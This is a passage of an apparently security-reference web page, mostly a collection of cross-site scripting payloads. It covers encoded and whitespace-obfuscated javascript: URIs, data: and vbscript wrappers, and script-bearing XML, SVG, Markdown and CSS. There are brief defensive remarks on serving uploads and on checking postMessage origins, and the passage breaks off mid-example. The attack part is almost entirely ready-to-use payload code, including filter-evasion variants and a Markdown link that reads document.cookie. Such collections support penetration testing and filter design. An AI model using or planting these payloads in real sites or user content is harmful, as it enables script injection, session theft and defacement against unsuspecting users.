<a id="__codelineno-16-5" name="__codelineno-16-5" href="#__codelineno-16-5"></a><span class="o">&amp;</span><span class="err">#</span><span class="mf">106</span><span class="o">&amp;</span><span class="err">#</span><span class="mf">97</span><span class="o">&amp;</span><span class="err">#</span><span class="mf">118</span><span class="o">&amp;</span><span class="err">#</span><span class="mf">97</span><span class="o">&amp;</span><span class="err">#</span><span class="mf">115</span><span class="o">&amp;</span><span class="err">#</span><span class="mf">99</span><span class="o">&amp;</span><span class="err">#</span><span class="mf">114</span><span class="o">&amp;</span><span class="err">#</span><span class="mf">105</span><span class="o">&amp;</span><span class="err">#</span><span class="mf">112</span><span class="o">&amp;</span><span class="err">#</span><span class="mf">116</span><span class="o">&amp;</span><span class="err">#</span><span class="mf">58</span><span class="o">&amp;</span><span class="err">#</span><span class="mf">99</span><span class="o">&amp;</span><span class="err">#</span><span class="mf">111</span><span class="o">&amp;</span><span class="err">#</span><span class="mf">110</span><span class="o">&amp;</span><span class="err">#</span><span class="mf">102</span><span class="o">&amp;</span><span class="err">#</span><span class="mf">105</span><span class="o">&amp;</span><span class="err">#</span><span class="mf">114</span><span class="o">&amp;</span><span class="err">#</span><span class="mf">109</span><span class="o">&amp;</span><span class="err">#</span><span class="mf">40</span><span class="o">&amp;</span><span class="err">#</span><span class="mf">49</span><span class="o">&amp;</span><span class="err">#</span><span class="mf">41</span>
<a id="__codelineno-16-6" name="__codelineno-16-6" href="#__codelineno-16-6"></a>
<a id="__codelineno-16-7" name="__codelineno-16-7" href="#__codelineno-16-7"></a><span class="nx">We</span><span class="w"> </span><span class="nx">can</span><span class="w"> </span><span class="nx">encode</span><span class="w"> </span><span class="nx">the</span><span class="w"> </span><span class="s2">&quot;javascript:&quot;</span><span class="w"> </span><span class="ow">in</span><span class="w"> </span><span class="nx">Hex</span><span class="o">/</span><span class="nx">Octal</span>
<a id="__codelineno-16-8" name="__codelineno-16-8" href="#__codelineno-16-8"></a><span class="err">\</span><span class="nx">x6A</span><span class="err">\</span><span class="nx">x61</span><span class="err">\</span><span class="nx">x76</span><span class="err">\</span><span class="nx">x61</span><span class="err">\</span><span class="nx">x73</span><span class="err">\</span><span class="nx">x63</span><span class="err">\</span><span class="nx">x72</span><span class="err">\</span><span class="nx">x69</span><span class="err">\</span><span class="nx">x70</span><span class="err">\</span><span class="nx">x74</span><span class="err">\</span><span class="nx">x3aalert</span><span class="p">(</span><span class="mf">1</span><span class="p">)</span>
<a id="__codelineno-16-9" name="__codelineno-16-9" href="#__codelineno-16-9"></a><span class="nx">\u006A\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u003aalert</span><span class="p">(</span><span class="mf">1</span><span class="p">)</span>
<a id="__codelineno-16-10" name="__codelineno-16-10" href="#__codelineno-16-10"></a><span class="err">\</span><span class="mf">152</span><span class="err">\</span><span class="mf">141</span><span class="err">\</span><span class="mf">166</span><span class="err">\</span><span class="mf">141</span><span class="err">\</span><span class="mf">163</span><span class="err">\</span><span class="mf">143</span><span class="err">\</span><span class="mf">162</span><span class="err">\</span><span class="mf">151</span><span class="err">\</span><span class="mf">160</span><span class="err">\</span><span class="mf">164</span><span class="err">\</span><span class="mo">072</span><span class="nx">alert</span><span class="p">(</span><span class="mf">1</span><span class="p">)</span>
<a id="__codelineno-16-11" name="__codelineno-16-11" href="#__codelineno-16-11"></a>
<a id="__codelineno-16-12" name="__codelineno-16-12" href="#__codelineno-16-12"></a><span class="nx">We</span><span class="w"> </span><span class="nx">can</span><span class="w"> </span><span class="nx">use</span><span class="w"> </span><span class="nx">a</span><span class="w"> </span><span class="s1">&#39;newline character&#39;</span>
<a id="__codelineno-16-13" name="__codelineno-16-13" href="#__codelineno-16-13"></a><span class="nx">java</span><span class="o">%</span><span class="mf">0</span><span class="nx">ascript</span><span class="o">:</span><span class="nx">alert</span><span class="p">(</span><span class="mf">1</span><span class="p">)</span><span class="w"> </span><span class="o">-</span><span class="w"> </span><span class="nx">LF</span><span class="w"> </span><span class="p">(</span><span class="err">\</span><span class="nx">n</span><span class="p">)</span>
<a id="__codelineno-16-14" name="__codelineno-16-14" href="#__codelineno-16-14"></a><span class="nx">java</span><span class="o">%</span><span class="mf">09</span><span class="nx">script</span><span class="o">:</span><span class="nx">alert</span><span class="p">(</span><span class="mf">1</span><span class="p">)</span><span class="w"> </span><span class="o">-</span><span class="w"> </span><span class="nx">Horizontal</span><span class="w"> </span><span class="nx">tab</span><span class="w"> </span><span class="p">(</span><span class="err">\</span><span class="nx">t</span><span class="p">)</span>
<a id="__codelineno-16-15" name="__codelineno-16-15" href="#__codelineno-16-15"></a><span class="nx">java</span><span class="o">%</span><span class="mf">0</span><span class="nx">dscript</span><span class="o">:</span><span class="nx">alert</span><span class="p">(</span><span class="mf">1</span><span class="p">)</span><span class="w"> </span><span class="o">-</span><span class="w"> </span><span class="nx">CR</span><span class="w"> </span><span class="p">(</span><span class="err">\</span><span class="nx">r</span><span class="p">)</span>
<a id="__codelineno-16-16" name="__codelineno-16-16" href="#__codelineno-16-16"></a>
<a id="__codelineno-16-17" name="__codelineno-16-17" href="#__codelineno-16-17"></a><span class="nx">Using</span><span class="w"> </span><span class="nx">the</span><span class="w"> </span><span class="nx">escape</span><span class="w"> </span><span class="nx">character</span>
<a id="__codelineno-16-18" name="__codelineno-16-18" href="#__codelineno-16-18"></a><span class="err">\</span><span class="nx">j</span><span class="err">\</span><span class="nx">av</span><span class="err">\</span><span class="nx">a</span><span class="err">\</span><span class="nx">s</span><span class="err">\</span><span class="nx">cr</span><span class="err">\</span><span class="nx">i</span><span class="err">\</span><span class="nx">pt</span><span class="err">\</span><span class="o">:</span><span class="err">\</span><span class="nx">a</span><span class="err">\</span><span class="nx">l</span><span class="err">\</span><span class="nx">ert</span><span class="err">\</span><span class="p">(</span><span class="mf">1</span><span class="err">\</span><span class="p">)</span>
<a id="__codelineno-16-19" name="__codelineno-16-19" href="#__codelineno-16-19"></a>
<a id="__codelineno-16-20" name="__codelineno-16-20" href="#__codelineno-16-20"></a><span class="nx">Using</span><span class="w"> </span><span class="nx">the</span><span class="w"> </span><span class="nx">newline</span><span class="w"> </span><span class="nx">and</span><span class="w"> </span><span class="nx">a</span><span class="w"> </span><span class="nx">comment</span><span class="w"> </span><span class="c1">//</span>
<a id="__codelineno-16-21" name="__codelineno-16-21" href="#__codelineno-16-21"></a><span class="nx">javascript</span><span class="o">:</span><span class="c1">//%0Aalert(1)</span>
<a id="__codelineno-16-22" name="__codelineno-16-22" href="#__codelineno-16-22"></a><span class="nx">javascript</span><span class="o">:</span><span class="c1">//anything%0D%0A%0D%0Awindow.alert(1)</span>
</code></pre></div>
<h3 id="wrapper-data">Wrapper data</h3>
<div class="highlight"><pre><span></span><code><a id="__codelineno-17-1" name="__codelineno-17-1" href="#__codelineno-17-1"></a><span class="nx">data</span><span class="o">:</span><span class="nx">text</span><span class="o">/</span><span class="nx">html</span><span class="p">,</span><span class="o">&lt;</span><span class="nx">script</span><span class="o">&gt;</span><span class="nx">alert</span><span class="p">(</span><span class="mf">0</span><span class="p">)</span><span class="o">&lt;</span><span class="err">/script&gt;</span>
<a id="__codelineno-17-2" name="__codelineno-17-2" href="#__codelineno-17-2"></a><span class="nx">data</span><span class="o">:</span><span class="nx">text</span><span class="o">/</span><span class="nx">html</span><span class="p">;</span><span class="nx">base64</span><span class="p">,</span><span class="nx">PHN2Zy9vbmxvYWQ9YWxlcnQoMik</span><span class="o">+</span>
<a id="__codelineno-17-3" name="__codelineno-17-3" href="#__codelineno-17-3"></a><span class="o">&lt;</span><span class="nx">script</span><span class="w"> </span><span class="nx">src</span><span class="o">=</span><span class="s2">&quot;data:;base64,YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ==&quot;</span><span class="o">&gt;&lt;</span><span class="err">/script&gt;</span>
</code></pre></div>
<h3 id="wrapper-vbscript">Wrapper vbscript</h3>
<p>Only works in Internet Explorer.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-18-1" name="__codelineno-18-1" href="#__codelineno-18-1"></a><span class="nx">vbscript</span><span class="o">:</span><span class="nx">msgbox</span><span class="p">(</span><span class="s2">&quot;XSS&quot;</span><span class="p">)</span>
</code></pre></div>
<h2 id="xss-in-files">XSS in Files</h2>
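<p><strong>NOTE:</strong> The XML CDATA section is used here so that the JavaScript payload will not be treated as XML markup.</p>
<p>The XML and SVG examples in this section execute only when the browser renders the file as an active document on the application's own origin. Serving user-supplied files from a separate origin, with an accurate <code>Content-Type</code>, <code>X-Content-Type-Options: nosniff</code> and <code>Content-Disposition: attachment</code>, keeps script inside such a file away from the application's session.</p>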
<div class="highlight"><pre><span></span><code><a id="__codelineno-19-1" name="__codelineno-19-1" href="#__codelineno-19-1"></a><span class="nt">&lt;name&gt;</span>
<a id="__codelineno-19-2" name="__codelineno-19-2" href="#__codelineno-19-2"></a><span class="w"> </span><span class="nt">&lt;value&gt;</span><span class="cp">&lt;![CDATA[&lt;script&gt;confirm(document.domain)&lt;/script&gt;]]&gt;</span><span class="nt">&lt;/value&gt;</span>
<a id="__codelineno-19-3" name="__codelineno-19-3" href="#__codelineno-19-3"></a><span class="nt">&lt;/name&gt;</span>
</code></pre></div>
<h3 id="xss-in-xml">XSS in XML</h3>
<div class="highlight"><pre><span></span><code><a id="__codelineno-20-1" name="__codelineno-20-1" href="#__codelineno-20-1"></a><span class="nt">&lt;html&gt;</span>
<a id="__codelineno-20-2" name="__codelineno-20-2" href="#__codelineno-20-2"></a><span class="nt">&lt;head&gt;&lt;/head&gt;</span>
<a id="__codelineno-20-3" name="__codelineno-20-3" href="#__codelineno-20-3"></a><span class="nt">&lt;body&gt;</span>
<a id="__codelineno-20-4" name="__codelineno-20-4" href="#__codelineno-20-4"></a><span class="nt">&lt;something:script</span><span class="w"> </span><span class="na">xmlns:something=</span><span class="s">&quot;http://www.w3.org/1999/xhtml&quot;</span><span class="nt">&gt;</span>alert(1)<span class="nt">&lt;/something:script&gt;</span>
<a id="__codelineno-20-5" name="__codelineno-20-5" href="#__codelineno-20-5"></a><span class="nt">&lt;/body&gt;</span>
<a id="__codelineno-20-6" name="__codelineno-20-6" href="#__codelineno-20-6"></a><span class="nt">&lt;/html&gt;</span>
</code></pre></div>
<h3 id="xss-in-svg">XSS in SVG</h3>
<p>Simple script. Codename: green triangle</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-21-1" name="__codelineno-21-1" href="#__codelineno-21-1"></a><span class="cp">&lt;?xml version=&quot;1.0&quot; standalone=&quot;no&quot;?&gt;</span>
<a id="__codelineno-21-2" name="__codelineno-21-2" href="#__codelineno-21-2"></a><span class="cp">&lt;!DOCTYPE svg PUBLIC &quot;-//W3C//DTD SVG 1.1//EN&quot; &quot;http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd&quot;&gt;</span>
<a id="__codelineno-21-3" name="__codelineno-21-3" href="#__codelineno-21-3"></a>
<a id="__codelineno-21-4" name="__codelineno-21-4" href="#__codelineno-21-4"></a><span class="nt">&lt;svg</span><span class="w"> </span><span class="na">version=</span><span class="s">&quot;1.1&quot;</span><span class="w"> </span><span class="na">baseProfile=</span><span class="s">&quot;full&quot;</span><span class="w"> </span><span class="na">xmlns=</span><span class="s">&quot;http://www.w3.org/2000/svg&quot;</span><span class="nt">&gt;</span>
<a id="__codelineno-21-5" name="__codelineno-21-5" href="#__codelineno-21-5"></a><span class="w"> </span><span class="nt">&lt;polygon</span><span class="w"> </span><span class="na">id=</span><span class="s">&quot;triangle&quot;</span><span class="w"> </span><span class="na">points=</span><span class="s">&quot;0,0 0,50 50,0&quot;</span><span class="w"> </span><span class="na">fill=</span><span class="s">&quot;#009900&quot;</span><span class="w"> </span><span class="na">stroke=</span><span class="s">&quot;#004400&quot;</span><span class="nt">/&gt;</span>
<a id="__codelineno-21-6" name="__codelineno-21-6" href="#__codelineno-21-6"></a><span class="w"> </span><span class="nt">&lt;script</span><span class="w"> </span><span class="na">type=</span><span class="s">&quot;text/javascript&quot;</span><span class="nt">&gt;</span>
<a id="__codelineno-21-7" name="__codelineno-21-7" href="#__codelineno-21-7"></a><span class="w"> </span>alert(document.domain);
<a id="__codelineno-21-8" name="__codelineno-21-8" href="#__codelineno-21-8"></a><span class="w"> </span><span class="nt">&lt;/script&gt;</span>
<a id="__codelineno-21-9" name="__codelineno-21-9" href="#__codelineno-21-9"></a><span class="nt">&lt;/svg&gt;</span>
</code></pre></div>
<p>More comprehensive payload with svg tag attribute, desc script, foreignObject script, foreignObject iframe, title script, animatetransform event and simple script. Codename: red lightning. Author: noraj.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-22-1" name="__codelineno-22-1" href="#__codelineno-22-1"></a><span class="cp">&lt;?xml version=&quot;1.0&quot; standalone=&quot;no&quot;?&gt;</span>
<a id="__codelineno-22-2" name="__codelineno-22-2" href="#__codelineno-22-2"></a><span class="cp">&lt;!DOCTYPE svg PUBLIC &quot;-//W3C//DTD SVG 1.1//EN&quot; &quot;http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd&quot;&gt;</span>
<a id="__codelineno-22-3" name="__codelineno-22-3" href="#__codelineno-22-3"></a>
<a id="__codelineno-22-4" name="__codelineno-22-4" href="#__codelineno-22-4"></a><span class="nt">&lt;svg</span><span class="w"> </span><span class="na">version=</span><span class="s">&quot;1.1&quot;</span><span class="w"> </span><span class="na">baseProfile=</span><span class="s">&quot;full&quot;</span><span class="w"> </span><span class="na">width=</span><span class="s">&quot;100&quot;</span><span class="w"> </span><span class="na">height=</span><span class="s">&quot;100&quot;</span><span class="w"> </span><span class="na">xmlns=</span><span class="s">&quot;http://www.w3.org/2000/svg&quot;</span><span class="w"> </span><span class="na">onload=</span><span class="s">&quot;alert(&#39;svg attribut&#39;)&quot;</span><span class="nt">&gt;</span>
<a id="__codelineno-22-5" name="__codelineno-22-5" href="#__codelineno-22-5"></a><span class="w"> </span><span class="nt">&lt;polygon</span><span class="w"> </span><span class="na">id=</span><span class="s">&quot;lightning&quot;</span><span class="w"> </span><span class="na">points=</span><span class="s">&quot;0,100 50,25 50,75 100,0&quot;</span><span class="w"> </span><span class="na">fill=</span><span class="s">&quot;#ff1919&quot;</span><span class="w"> </span><span class="na">stroke=</span><span class="s">&quot;#ff0000&quot;</span><span class="nt">/&gt;</span>
<a id="__codelineno-22-6" name="__codelineno-22-6" href="#__codelineno-22-6"></a><span class="w"> </span><span class="nt">&lt;desc&gt;&lt;script&gt;</span>alert(&#39;svg<span class="w"> </span>desc&#39;)<span class="nt">&lt;/script&gt;&lt;/desc&gt;</span>
<a id="__codelineno-22-7" name="__codelineno-22-7" href="#__codelineno-22-7"></a><span class="w"> </span><span class="nt">&lt;foreignObject&gt;&lt;script&gt;</span>alert(&#39;svg<span class="w"> </span>foreignObject&#39;)<span class="nt">&lt;/script&gt;&lt;/foreignObject&gt;</span>
<a id="__codelineno-22-8" name="__codelineno-22-8" href="#__codelineno-22-8"></a><span class="w"> </span><span class="nt">&lt;foreignObject</span><span class="w"> </span><span class="na">width=</span><span class="s">&quot;500&quot;</span><span class="w"> </span><span class="na">height=</span><span class="s">&quot;500&quot;</span><span class="nt">&gt;</span>
<a id="__codelineno-22-9" name="__codelineno-22-9" href="#__codelineno-22-9"></a><span class="w"> </span><span class="nt">&lt;iframe</span><span class="w"> </span><span class="na">xmlns=</span><span class="s">&quot;http://www.w3.org/1999/xhtml&quot;</span><span class="w"> </span><span class="na">src=</span><span class="s">&quot;javascript:alert(&#39;svg foreignObject iframe&#39;);&quot;</span><span class="w"> </span><span class="na">width=</span><span class="s">&quot;400&quot;</span><span class="w"> </span><span class="na">height=</span><span class="s">&quot;250&quot;</span><span class="nt">/&gt;</span>
<a id="__codelineno-22-10" name="__codelineno-22-10" href="#__codelineno-22-10"></a><span class="w"> </span><span class="nt">&lt;/foreignObject&gt;</span>
<a id="__codelineno-22-11" name="__codelineno-22-11" href="#__codelineno-22-11"></a><span class="w"> </span><span class="nt">&lt;title&gt;&lt;script&gt;</span>alert(&#39;svg<span class="w"> </span>title&#39;)<span class="nt">&lt;/script&gt;&lt;/title&gt;</span>
<a id="__codelineno-22-12" name="__codelineno-22-12" href="#__codelineno-22-12"></a><span class="w"> </span><span class="nt">&lt;animatetransform</span><span class="w"> </span><span class="na">onbegin=</span><span class="s">&quot;alert(&#39;svg animatetransform onbegin&#39;)&quot;</span><span class="nt">&gt;&lt;/animatetransform&gt;</span>
<a id="__codelineno-22-13" name="__codelineno-22-13" href="#__codelineno-22-13"></a><span class="w"> </span><span class="nt">&lt;script</span><span class="w"> </span><span class="na">type=</span><span class="s">&quot;text/javascript&quot;</span><span class="nt">&gt;</span>
<a id="__codelineno-22-14" name="__codelineno-22-14" href="#__codelineno-22-14"></a><span class="w"> </span>alert(&#39;svg<span class="w"> </span>script&#39;);
<a id="__codelineno-22-15" name="__codelineno-22-15" href="#__codelineno-22-15"></a><span class="w"> </span><span class="nt">&lt;/script&gt;</span>
<a id="__codelineno-22-16" name="__codelineno-22-16" href="#__codelineno-22-16"></a><span class="nt">&lt;/svg&gt;</span>
</code></pre></div>
<h4 id="short-svg-payload">Short SVG Payload</h4>
<div class="highlight"><pre><span></span><code><a id="__codelineno-23-1" name="__codelineno-23-1" href="#__codelineno-23-1"></a><span class="o">&lt;</span><span class="nx">svg</span><span class="w"> </span><span class="nx">xmlns</span><span class="o">=</span><span class="s2">&quot;http://www.w3.org/2000/svg&quot;</span><span class="w"> </span><span class="nx">onload</span><span class="o">=</span><span class="s2">&quot;alert(document.domain)&quot;</span><span class="o">/&gt;</span>
<a id="__codelineno-23-2" name="__codelineno-23-2" href="#__codelineno-23-2"></a>
<a id="__codelineno-23-3" name="__codelineno-23-3" href="#__codelineno-23-3"></a><span class="o">&lt;</span><span class="nx">svg</span><span class="o">&gt;&lt;</span><span class="nx">desc</span><span class="o">&gt;&lt;!</span><span class="p">[</span><span class="nx">CDATA</span><span class="p">[</span><span class="o">&lt;</span><span class="err">/desc&gt;&lt;script&gt;alert(1)&lt;/script&gt;]]&gt;&lt;/svg&gt;</span>
<a id="__codelineno-23-4" name="__codelineno-23-4" href="#__codelineno-23-4"></a><span class="o">&lt;</span><span class="nx">svg</span><span class="o">&gt;&lt;</span><span class="nx">foreignObject</span><span class="o">&gt;&lt;!</span><span class="p">[</span><span class="nx">CDATA</span><span class="p">[</span><span class="o">&lt;</span><span class="err">/foreignObject&gt;&lt;script&gt;alert(2)&lt;/script&gt;]]&gt;&lt;/svg&gt;</span>
<a id="__codelineno-23-5" name="__codelineno-23-5" href="#__codelineno-23-5"></a><span class="o">&lt;</span><span class="nx">svg</span><span class="o">&gt;&lt;</span><span class="nx">title</span><span class="o">&gt;&lt;!</span><span class="p">[</span><span class="nx">CDATA</span><span class="p">[</span><span class="o">&lt;</span><span class="err">/title&gt;&lt;script&gt;alert(3)&lt;/script&gt;]]&gt;&lt;/svg&gt;</span>
</code></pre></div>
<h3 id="nesting-svg-and-xss">Nesting SVG and XSS</h3>
<p>Including a remote SVG image in an SVG works but won't trigger the XSS embedded in the remote SVG, because browsers render an SVG that is loaded as an image with script execution disabled. Author: noraj.</p>
<p>SVG 1.x (xlink:href)</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-24-1" name="__codelineno-24-1" href="#__codelineno-24-1"></a><span class="nt">&lt;svg</span><span class="w"> </span><span class="na">width=</span><span class="s">&quot;200&quot;</span><span class="w"> </span><span class="na">height=</span><span class="s">&quot;200&quot;</span><span class="w"> </span><span class="na">xmlns=</span><span class="s">&quot;http://www.w3.org/2000/svg&quot;</span><span class="w"> </span><span class="na">xmlns:xlink=</span><span class="s">&quot;http://www.w3.org/1999/xlink&quot;</span><span class="nt">&gt;</span>
<a id="__codelineno-24-2" name="__codelineno-24-2" href="#__codelineno-24-2"></a><span class="w"> </span><span class="nt">&lt;image</span><span class="w"> </span><span class="na">xlink:href=</span><span class="s">&quot;http://127.0.0.1:9999/red_lightning_xss_full.svg&quot;</span><span class="w"> </span><span class="na">height=</span><span class="s">&quot;200&quot;</span><span class="w"> </span><span class="na">width=</span><span class="s">&quot;200&quot;</span><span class="nt">/&gt;</span>
<a id="__codelineno-24-3" name="__codelineno-24-3" href="#__codelineno-24-3"></a><span class="nt">&lt;/svg&gt;</span>
</code></pre></div>
<p>Including a remote SVG fragment in an SVG works but won't trigger the XSS embedded in the remote SVG element, because it's impossible to add a vulnerable attribute on a polygon/rect/etc. since the <code>style</code> attribute is no longer a vector on modern browsers. Author: noraj.</p>
<p>SVG 1.x (xlink:href)</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-25-1" name="__codelineno-25-1" href="#__codelineno-25-1"></a><span class="nt">&lt;svg</span><span class="w"> </span><span class="na">width=</span><span class="s">&quot;200&quot;</span><span class="w"> </span><span class="na">height=</span><span class="s">&quot;200&quot;</span><span class="w"> </span><span class="na">xmlns=</span><span class="s">&quot;http://www.w3.org/2000/svg&quot;</span><span class="w"> </span><span class="na">xmlns:xlink=</span><span class="s">&quot;http://www.w3.org/1999/xlink&quot;</span><span class="nt">&gt;</span>
<a id="__codelineno-25-2" name="__codelineno-25-2" href="#__codelineno-25-2"></a><span class="w"> </span><span class="nt">&lt;use</span><span class="w"> </span><span class="na">xlink:href=</span><span class="s">&quot;http://127.0.0.1:9999/red_lightning_xss_full.svg#lightning&quot;</span><span class="nt">/&gt;</span>
<a id="__codelineno-25-3" name="__codelineno-25-3" href="#__codelineno-25-3"></a><span class="nt">&lt;/svg&gt;</span>
</code></pre></div>
<p>However, including svg tags in SVG documents works and allows XSS execution from sub-SVGs. Codename: french flag. Author: noraj.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-26-1" name="__codelineno-26-1" href="#__codelineno-26-1"></a><span class="nt">&lt;svg</span><span class="w"> </span><span class="na">xmlns=</span><span class="s">&quot;http://www.w3.org/2000/svg&quot;</span><span class="w"> </span><span class="na">xmlns:xlink=</span><span class="s">&quot;http://www.w3.org/1999/xlink&quot;</span><span class="nt">&gt;</span>
<a id="__codelineno-26-2" name="__codelineno-26-2" href="#__codelineno-26-2"></a><span class="w"> </span><span class="nt">&lt;svg</span><span class="w"> </span><span class="na">x=</span><span class="s">&quot;10&quot;</span><span class="nt">&gt;</span>
<a id="__codelineno-26-3" name="__codelineno-26-3" href="#__codelineno-26-3"></a><span class="w"> </span><span class="nt">&lt;rect</span><span class="w"> </span><span class="na">x=</span><span class="s">&quot;10&quot;</span><span class="w"> </span><span class="na">y=</span><span class="s">&quot;10&quot;</span><span class="w"> </span><span class="na">height=</span><span class="s">&quot;100&quot;</span><span class="w"> </span><span class="na">width=</span><span class="s">&quot;100&quot;</span><span class="w"> </span><span class="na">style=</span><span class="s">&quot;fill: #002654&quot;</span><span class="nt">/&gt;</span>
<a id="__codelineno-26-4" name="__codelineno-26-4" href="#__codelineno-26-4"></a><span class="w"> </span><span class="nt">&lt;script</span><span class="w"> </span><span class="na">type=</span><span class="s">&quot;text/javascript&quot;</span><span class="nt">&gt;</span>alert(&#39;sub-svg<span class="w"> </span>1&#39;);<span class="nt">&lt;/script&gt;</span>
<a id="__codelineno-26-5" name="__codelineno-26-5" href="#__codelineno-26-5"></a><span class="w"> </span><span class="nt">&lt;/svg&gt;</span>
<a id="__codelineno-26-6" name="__codelineno-26-6" href="#__codelineno-26-6"></a><span class="w"> </span><span class="nt">&lt;svg</span><span class="w"> </span><span class="na">x=</span><span class="s">&quot;200&quot;</span><span class="nt">&gt;</span>
<a id="__codelineno-26-7" name="__codelineno-26-7" href="#__codelineno-26-7"></a><span class="w"> </span><span class="nt">&lt;rect</span><span class="w"> </span><span class="na">x=</span><span class="s">&quot;10&quot;</span><span class="w"> </span><span class="na">y=</span><span class="s">&quot;10&quot;</span><span class="w"> </span><span class="na">height=</span><span class="s">&quot;100&quot;</span><span class="w"> </span><span class="na">width=</span><span class="s">&quot;100&quot;</span><span class="w"> </span><span class="na">style=</span><span class="s">&quot;fill: #ED2939&quot;</span><span class="nt">/&gt;</span>
<a id="__codelineno-26-8" name="__codelineno-26-8" href="#__codelineno-26-8"></a><span class="w"> </span><span class="nt">&lt;script</span><span class="w"> </span><span class="na">type=</span><span class="s">&quot;text/javascript&quot;</span><span class="nt">&gt;</span>alert(&#39;sub-svg<span class="w"> </span>2&#39;);<span class="nt">&lt;/script&gt;</span>
<a id="__codelineno-26-9" name="__codelineno-26-9" href="#__codelineno-26-9"></a><span class="w"> </span><span class="nt">&lt;/svg&gt;</span>
<a id="__codelineno-26-10" name="__codelineno-26-10" href="#__codelineno-26-10"></a><span class="nt">&lt;/svg&gt;</span>
</code></pre></div>
<h3 id="xss-in-markdown">XSS in Markdown</h3>
<div class="highlight"><pre><span></span><code><a id="__codelineno-27-1" name="__codelineno-27-1" href="#__codelineno-27-1"></a><span class="na">[a]</span><span class="p">(</span><span class="n">javascript</span><span class="p">:</span><span class="n">prompt</span><span class="p">(</span><span class="n">document</span><span class="p">.</span><span class="n">cookie</span><span class="p">))</span>
<a id="__codelineno-27-2" name="__codelineno-27-2" href="#__codelineno-27-2"></a><span class="na">[a]</span><span class="p">(</span><span class="n">j</span><span class="w"> </span><span class="n">a</span><span class="w"> </span><span class="n">v</span><span class="w"> </span><span class="n">a</span><span class="w"> </span><span class="n">s</span><span class="w"> </span><span class="n">c</span><span class="w"> </span><span class="n">r</span><span class="w"> </span><span class="n">i</span><span class="w"> </span><span class="n">p</span><span class="w"> </span><span class="n">t</span><span class="p">:</span><span class="n">prompt</span><span class="p">(</span><span class="n">document</span><span class="p">.</span><span class="n">cookie</span><span class="p">))</span>
<a id="__codelineno-27-3" name="__codelineno-27-3" href="#__codelineno-27-3"></a><span class="na">[a]</span><span class="p">(</span><span class="n">data</span><span class="p">:</span><span class="n">text</span><span class="o">/</span><span class="n">html</span><span class="p">;</span><span class="n">base64</span><span class="p">,</span><span class="n">PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K</span><span class="p">)</span>
<a id="__codelineno-27-4" name="__codelineno-27-4" href="#__codelineno-27-4"></a><span class="na">[a]</span><span class="p">(</span><span class="n">javascript</span><span class="p">:</span><span class="n">window</span><span class="p">.</span><span class="n">onerror</span><span class="o">=</span><span class="n">alert</span><span class="p">;</span><span class="k">throw</span><span class="o">%</span><span class="mi">201</span><span class="p">)</span>
</code></pre></div>
<h3 id="xss-in-css">XSS in CSS</h3>
<div class="highlight"><pre><span></span><code><a id="__codelineno-28-1" name="__codelineno-28-1" href="#__codelineno-28-1"></a><span class="cp">&lt;!DOCTYPE html&gt;</span>
<a id="__codelineno-28-2" name="__codelineno-28-2" href="#__codelineno-28-2"></a><span class="p">&lt;</span><span class="nt">html</span><span class="p">&gt;</span>
<a id="__codelineno-28-3" name="__codelineno-28-3" href="#__codelineno-28-3"></a><span class="p">&lt;</span><span class="nt">head</span><span class="p">&gt;</span>
<a id="__codelineno-28-4" name="__codelineno-28-4" href="#__codelineno-28-4"></a><span class="p">&lt;</span><span class="nt">style</span><span class="p">&gt;</span>
<a id="__codelineno-28-5" name="__codelineno-28-5" href="#__codelineno-28-5"></a><span class="nt">div</span><span class="w"> </span><span class="p">{</span>
<a id="__codelineno-28-6" name="__codelineno-28-6" href="#__codelineno-28-6"></a><span class="w"> </span><span class="k">background-image</span><span class="p">:</span><span class="w"> </span><span class="nb">url</span><span class="p">(</span><span class="s2">&quot;data:image/jpg;base64,&lt;\/style&gt;&lt;svg/onload=alert(document.domain)&gt;&quot;</span><span class="p">);</span>
<a id="__codelineno-28-7" name="__codelineno-28-7" href="#__codelineno-28-7"></a><span class="w"> </span><span class="k">background-color</span><span class="p">:</span><span class="w"> </span><span class="mh">#cccccc</span><span class="p">;</span>
<a id="__codelineno-28-8" name="__codelineno-28-8" href="#__codelineno-28-8"></a><span class="p">}</span>
<a id="__codelineno-28-9" name="__codelineno-28-9" href="#__codelineno-28-9"></a><span class="p">&lt;/</span><span class="nt">style</span><span class="p">&gt;</span>
<a id="__codelineno-28-10" name="__codelineno-28-10" href="#__codelineno-28-10"></a><span class="p">&lt;/</span><span class="nt">head</span><span class="p">&gt;</span>
<a id="__codelineno-28-11" name="__codelineno-28-11" href="#__codelineno-28-11"></a> <span class="p">&lt;</span><span class="nt">body</span><span class="p">&gt;</span>
<a id="__codelineno-28-12" name="__codelineno-28-12" href="#__codelineno-28-12"></a> <span class="p">&lt;</span><span class="nt">div</span><span class="p">&gt;</span>lol<span class="p">&lt;/</span><span class="nt">div</span><span class="p">&gt;</span>
<a id="__codelineno-28-13" name="__codelineno-28-13" href="#__codelineno-28-13"></a> <span class="p">&lt;/</span><span class="nt">body</span><span class="p">&gt;</span>
<a id="__codelineno-28-14" name="__codelineno-28-14" href="#__codelineno-28-14"></a><span class="p">&lt;/</span><span class="nt">html</span><span class="p">&gt;</span>
</code></pre></div>
<h2 id="xss-in-postmessage">XSS in PostMessage</h2>
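<blockquote>
<p>If the target origin is an asterisk (<code>*</code>), the message can be sent to any domain that has a reference to the child page.</p>
</blockquote>
<p>The example below only has an effect when the receiving page's <code>message</code> handler accepts messages without checking <code>event.origin</code> and, presumably, passes the <code>url</code> field to a navigation sink without validating it. Receivers should compare <code>event.origin</code> against an exact allowlist and accept only <code>http:</code>/<code>https:</code> URLs; senders should pass the intended origin instead of <code>*</code>.</p>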
<div class="highlight"><pre><span></span><code><a id="__codelineno-29-1" name="__codelineno-29-1" href="#__codelineno-29-1"></a><span class="p">&lt;</span><span class="nt">html</span><span class="p">&gt;</span>
<a id="__codelineno-29-2" name="__codelineno-29-2" href="#__codelineno-29-2"></a><span class="p">&lt;</span><span class="nt">body</span><span class="p">&gt;</span>
